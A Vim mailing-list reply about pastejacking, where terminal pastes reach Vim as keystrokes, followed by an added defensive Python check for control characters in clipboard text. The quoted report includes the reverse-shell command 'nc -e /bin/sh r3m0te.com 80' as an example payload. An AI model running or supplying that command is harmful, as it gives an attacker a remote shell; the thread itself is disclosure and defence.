sıx wrote:
> On 01/19/2017 08:05 AM, Marc Weber wrote:
> >
> > Insert mode is not for pasting, see pastetoggle / paste options.
> > :r!cat then ctrl-d is a fast workaround for linux systems.
> >
> > If you can reproduce your issue with paste mode you clearly have found
> > a bug (IMHO). In the other case I'm unsure because pasting is no
> > different from typing thus you probably can paste :!<run command>
> > equally well in some way or <c-r>=system('...') like command (no idea,
> > never tried it)
> >
> > Other people might have more knowledge.
> >
> > Marc Weber
> >
>
> The trigger in this is a commonly used "ctrl+shift+v". I have asked
> around a few vim users about how they copy a text from a website into a
> file opened by vim. It looks like everyone is doing it that way.

That is not so. A user should start insert mode and then paste with
a middle mouse click. Only then will Vim know that this is pasted text
and handle it properly.

When using ctrl-shift-v you are actually pasting into the terminal. Vim
doesn't see this as a paste action. It's then the terminal that sends
the pasted text to the running program. If that's Vim then it will
execute the keystrokes as if they were typed. Just like any other
program would do that, including a shell. There is nothing wrong with
that.

> Maybe I was not clear enough in the first mail, but the exploit scenario
> can be the following:
>
> 1. User opens a website, for example "Vim Tutorial".
> 2. User copies text from the webpage, but it's pastejacked (eg. the user
> copies the exploit payload and not what he sees on the site). Reference:
> https://github.com/dxa4481/Pastejacking
> 3. User inserts this text by "ctrl+shift+v" into a file opened by vim.
> (note: he does not even need to be in INSERT mode of course.)
> 4. Then by this, INSERT mode is escaped if needed and the following is
> executed: nc -e /bin/sh r3m0te.com 80
>
>
> In case the file containing the crafted message, it does not escape, but
> in case of manual copy paste there is always a way to make it work.
>
> If you think it's just a bug, then I can share the PoC here, but for
> sure it can be really dangerous.

Yes, copy/pasting stuff from a website can be dangerous. Guess what,
just opening a web site is already dangerous (that's how many phishing
attacks work, they just trick you into opening a web site that's
infected).

In my opinion both problems need to be fixed on the side of the browser,
anything else isn't going to fix the problem.

--
"Intelligence has much less practical application than you'd think."
-- Scott Adams, Dilbert.
/// Bram Moolenaar -- [email protected] -- http://www.Moolenaar.net \\\
/// sponsor Vim, vote for features -- http://www.Vim.org/sponsor/ \\\
\\\ an exciting new programming language -- http://www.Zimbu.org ///
\\\ help me help AIDS victims -- http://ICCF-Holland.org ///
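
Added example, not part of the original thread and not code from Vim: since a terminal paste reaches the running program as ordinary keystrokes, one user-side check is to inspect clipboard text for control characters (ESC, CR and similar) before pasting. The function names and sample strings are constructed for illustration, and the check assumes the paste lands in insert mode.

```python
import unicodedata

# Assumption: tab and newline are expected in multi-line snippets and are kept.
# Note that a newline still submits a line when the paste target is a shell.
ALLOWED_CONTROLS = {"\t", "\n"}


def is_keystroke(ch):
    """True for C0/C1 control characters (ESC, CR, Ctrl-R, DEL, ...) that a
    terminal delivers to the program as key presses rather than literal text."""
    return ch not in ALLOWED_CONTROLS and unicodedata.category(ch) == "Cc"


def find_control_chars(text):
    """Return (offset, code point) for every control character in text."""
    return [(i, f"U+{ord(ch):04X}") for i, ch in enumerate(text) if is_keystroke(ch)]


def sanitize_paste(text):
    """Drop control characters so the text can only be inserted literally."""
    text = text.replace("\r\n", "\n")  # keep Windows line endings as newlines
    return "".join(ch for ch in text if not is_keystroke(ch))


# Constructed samples: what the user believes was copied, and clipboard
# content that carries an ESC (leaves insert mode) and a trailing CR.
CLEAN = "set number\nsyntax on\n"
SUSPECT = "set number\x1b:echo 1\r"

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("suspect", SUSPECT)):
        hits = find_control_chars(sample)
        print(label, "->", hits if hits else "no control characters")
    print(repr(sanitize_paste(SUSPECT)))
```

Stripping control characters does not help when the editor is in normal mode, where even plain printable text is interpreted as commands.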